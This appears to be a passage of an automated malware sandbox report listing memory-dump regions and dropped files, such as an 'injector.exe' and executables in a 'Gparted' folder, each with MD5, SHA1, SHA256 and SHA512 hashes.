memory/932-218-0x00000000076D0000-0x00000000076DA000-memory.dmp

memory/932-219-0x00000000078C0000-0x0000000007956000-memory.dmp

memory/932-220-0x0000000007850000-0x0000000007861000-memory.dmp

memory/932-221-0x0000000007880000-0x000000000788E000-memory.dmp

memory/932-222-0x0000000007890000-0x00000000078A4000-memory.dmp

memory/932-223-0x0000000007990000-0x00000000079AA000-memory.dmp

memory/932-224-0x0000000007970000-0x0000000007978000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

memory/3644-230-0x0000000000400000-0x0000000000CBD000-memory.dmp

memory/1168-235-0x0000000000400000-0x0000000000CBD000-memory.dmp

memory/2840-236-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/2592-237-0x0000000000400000-0x000000000071A000-memory.dmp

memory/4608-238-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4708-239-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1252-240-0x0000000000400000-0x0000000000CBD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Program Files (x86)\Gparted\Build.sfx.exe

MD5 e2a5322cf4256f572d4fd54cff0d29eb
SHA1 a6b8724f93aa2ca36ca45f9299ed7fc9fc225b15
SHA256 d0dd207d349892382ffb6210182688c051a6cb5be0231da098d78c4cf4c56563
SHA512 a100c2e509d3f16d008de419c8195f7e3c713f86275c9e9f3b52e3fd0ff1e209ba8b15339c41a198a84a6b66ab3d503dfcfd58fb9dbd48eb39b3508323a23f51

C:\Program Files (x86)\Gparted\Build.exe

MD5 c874508845d1c0bb486f5e41af8de480
SHA1 3ac7e246934ba74c1018d50138bea77b035d6f90
SHA256 4793a9e954f00007a2f352648cddbc30add3ff4b7f22c3e1500d3671b0eb36be
SHA512 80daa52fea184748c4b858af4c7a676dddddf4c3cfdfada44917abddb0495ab22a9728800ea7f408fb3e66c269eda9df2462a9f82cf6a57c254d6c233c46f758

memory/4328-272-0x0000000000CB0000-0x0000000000CD2000-memory.dmp

memory/4328-273-0x0000000002EF0000-0x0000000002EF8000-memory.dmp

memory/2728-275-0x00000000057A0000-0x0000000005AF4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bad860750c12390a8ab743c440804aaf
SHA1 7ca89cefe6e8ead4d5e458626613b0fdd65dff13
SHA256 f654829db0a97d68b279c6463884d15173bd2bb885222a0a696d3472f61e79ad
SHA512 c79c9188d71f810717ad8b33e90e6fcd9e7051428adf55e582ad5c408606e9108891e4fb7494757ee664161f1fa19b48fdab9aa1e284fdfe8869f0e206e672f7

memory/2728-286-0x0000000005E90000-0x0000000005EDC000-memory.dmp

memory/2728-288-0x0000000006F20000-0x0000000006F42000-memory.dmp

memory/2728-289-0x0000000007650000-0x0000000007BF4000-memory.dmp

memory/2592-290-0x0000000000400000-0x000000000071A000-memory.dmp

C:\Program Files (x86)\Gparted\gimagex.exe

MD5 85199ea4a530756b743ad4491ea84a44
SHA1 0842cd749986d65d400a9605d17d2ed7a59c13cc
SHA256 3ea24d7899169c28d505233e13b9c92b51cd1181be299487392700d29e13b9aa
SHA512 b82b1c0ba24fa3e4c1f5309eee4cc6be0dfcc20f64886a40e4eb35d804f36af864b3e4218d7f27f439fa45659af0d69410798c9b3d1e5cab5a259759b7ad1f99

memory/2592-297-0x0000000000400000-0x000000000071A000-memory.dmp

memory/2840-298-0x0000000000400000-0x00000000004D8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d9f327d549f33d66ea17259b211483e3
SHA1 6b6b966652150b0136acfb960a641949a0798fcb
SHA256 be0d99869ce40d1f9d2937f2a49d33d43b869138883309577cb5fb349b8993c6
SHA512 068e7a1ed132f8dc2e771a7b5dee018c0b41338729cffb61f29d7c2713f32bc961c90c2a54e13b5abb04dd9152370c8b47fb716d4bde539dee3c642cbc9adeaa

memory/1992-310-0x00000000061C0000-0x000000000620C000-memory.dmp

memory/1252-311-0x0000000000400000-0x0000000000CBD000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ca158fed3e2c702d8eb019f431320a4f
SHA1 46e92c9f260ea39d4f6296fa1fd3026315580c9f
SHA256 c09acfe11f4c7874bdb6486015be34ceb485f60496443e27f2791f536f83cdc5
SHA512 c1b57e0d7e605a0cd83b53f5f02024f3d3fcb51a664308d04ed6986753d3770d3a93945c1d0b0230d1dde79ccb7fcf960672fb6c2c81520cc7b55da387af82cb

memory/1252-326-0x0000000000400000-0x0000000000CBD000-memory.dmp

memory/1252-329-0x0000000000400000-0x0000000000CBD000-memory.dmp

memory/1252-332-0x0000000000400000-0x0000000000CBD000-memory.dmp

memory/1252-335-0x0000000000400000-0x0000000000CBD000-memory.dmp

memory/1252-338-0x0000000000400000-0x0000000000CBD000-memory.dmp

memory/1252-341-0x0000000000400000-0x0000000000CBD000-memory.dmp

memory/1252-344-0x0000000000400000-0x0000000000CBD000-memory.dmp

memory/1252-347-0x0000000000400000-0x0000000000CBD000-memory.dmp